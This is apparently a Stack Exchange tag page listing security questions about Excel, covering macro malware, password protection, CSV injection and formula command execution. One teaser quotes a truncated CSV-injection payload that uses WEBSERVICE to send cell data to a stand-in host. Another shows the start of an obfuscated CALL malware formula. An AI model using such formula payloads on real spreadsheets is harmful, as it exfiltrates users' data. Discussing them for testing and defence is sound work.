Questions tagged [excel]
A spreadsheet program that is part of Microsoft Office. Security issues can involve e.g. macros and code execution in formulas. See also [office].
16 questions
0votes
0answers
66views
Minimal permissions for EXCEL COM operations
I have a situation where i'm trying to limit the required permissions for an account that leverages Excel COM / process operations. Worth to be noted, this account is an AD Managed Service Account. ...
- 11
0votes
1answer
459views
Can double-clicking an infected .xlsx file infect me if it crashed?
I downloaded an Excel (.xlsx) file from the internet. Then I tried to open it by double-clicking on it. But it suddenly crashed. Could this mean it could've contained a virus or malware?
1vote
1answer
549views
Does Python in Excel have the same Security issues as VBS in Excel?
Microsoft Excel supports Python scripts (source). VBScript Macros within Excel are known to be a security risk (source). If I read this emotet article right, then VBScript macros allow arbitrary code ...
- 3,962
0votes
0answers
188views
Secure authentication method for creating an Excel data connection to SQL Server
My company has a website with data stored in Microsoft SQL Server on the production server. The production server is not in Active Directory. The firewall allows connections to the production SQL ...
1vote
0answers
138views
What are the ranges of values for DH parameter a and DH parameter b [closed]
I have discovered that Diffie Hellman(DH)shared key is unequal in Apple Numbers, Google Sheets, and Mac Excel (2008). In Section 1.0, the first try at a solution uses a small Prime to produce certain ...
4votes
2answers
10kviews
How safe is a password protected Excel file?
I have a need to send a 3rd party regular Excel files. I currently use excel password protection on the file itself and the password I use is known by the 3rd party. However, today I read a thread on ...
- 43
1vote
1answer
487views
Does malicious MS Office xlsb file with macros posses risk to OpenOffice?
I opened malicious MS Office xlsb file with OpenOffice by huge mistake. I am wondering does it possess any risk? From what I am aware Excel macros are not compatible with OpenOffice. So I should be ...
- 111
35votes
6answers
28kviews
Is it safe to store account credentials in an Excel sheet protected with a password?
Basically the title. For example, how bad is it to store passwords in an Excel sheet protected with a password, instead of storing passwords in Keypass or something else like Zoho Vault? Of course, ...
- 453
2votes
0answers
156views
Opened compromised Excel file - am I safe?
Long story short, got duped into opening an XLSM in Excel, with macros being enabled. Realised instantly. Digged into the Excel structure, found the following (extremely obfuscated) payload: =CALL(&...
0votes
1answer
2kviews
Can a text file disguised as .xlsm be malicious?
A hour ago we receive a suspicious mail targeting some of our mailing lists. It contains a .zip file, itself containing a .xlsm file. This .xlsm file appears to be recognized as an ASCII text file ...
- 113
2votes
1answer
4kviews
Crack windows excel password
I have many password protected microsoft excel worksheet and I need to be able to edit it. I have forgotten the password, and I know that I can edit the file and take out the password check, but I ...
- 21
10votes
2answers
8kviews
Does "=cmd" CSV injection still exist in 2020?
I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as: =WEBSERVICE(CONCAT("http://example.com/", CONCAT(...
- 311
3votes
0answers
2kviews
How to "unprotect" malicious workbook without knowing password
Right now I'm looking at an office document (most likely rtf based on it exploiting equation editor) that opens just fine when you double click it, but on further examination in a hex editor and in ...
- 133
4votes
1answer
653views
Exfiltrate data by injecting functions in Excel 2007 file rendered with PHP
I need to extract data from inside an Excel fille using Excel 2007 functions. The concept is somewhat related to stored XSS type of data exfiltration only that I need to use Excel 2007 functions (...
- 1,920
7votes
1answer
6kviews
External command execution in Excel formulas
It's known that MS Excel functionality of external references will allow executing arbitrary commands from its formulas with appropriate security warnings and confirmation required from the user. E.g....
- 8,439
